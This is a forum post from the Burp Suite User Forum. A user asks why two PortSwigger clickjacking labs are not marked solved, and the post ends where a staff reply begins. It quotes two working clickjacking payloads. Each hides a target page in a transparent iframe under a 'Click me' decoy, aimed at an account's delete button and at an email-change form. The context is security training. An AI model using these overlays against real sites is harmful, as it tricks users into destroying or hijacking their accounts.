Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Clickjacking : First 2 lab -> problem solving

Alberto | Last updated: Mar 16, 2021 11:39AM UTC

Hi, I'm doing the first 2 lab of Clickjacking. 1) Lab: Basic clickjacking with CSRF token protection 2) Lab: Clickjacking with form input data prefilled from a URL parameter In the first one, I did everything like the solution <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.1; z-index: 2; } div { position:absolute; top:610px; left:70px; z-index: 1; } </style> <div>Click me</div> <iframe src="UrlOfMyLab/my-account?id=wiener"></iframe> I clicked on Store, then checked with View Exploit and the "click me" is over the Delete Button. Then, If I press on "Deliver exploit to victim" I still don't get "Lab Solved". Before reading the solution I did a mistake pressing on "Click me", cause I deleted the account and still didn't get "Solved". Same problem with the second lab. <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.1; z-index: 2; } div { position:absolute; top:530px; left:70px; z-index: 1; } </style> <div> Click me</div> <iframe src="UrlOfMyLab/my-account?id=wiener&email=prova@prova.it"></iframe> I clicked on Store, then checked with View Exploit and the "click me" is over the Change Email Button. Then, If I press on "Deliver exploit to victim" I still don't get "Lab Solved" In this case I pressed on Click Me and I can see the email has changed

Ben, PortSwigger Agent | Last updated: Mar 17, 2021 02:40PM UTC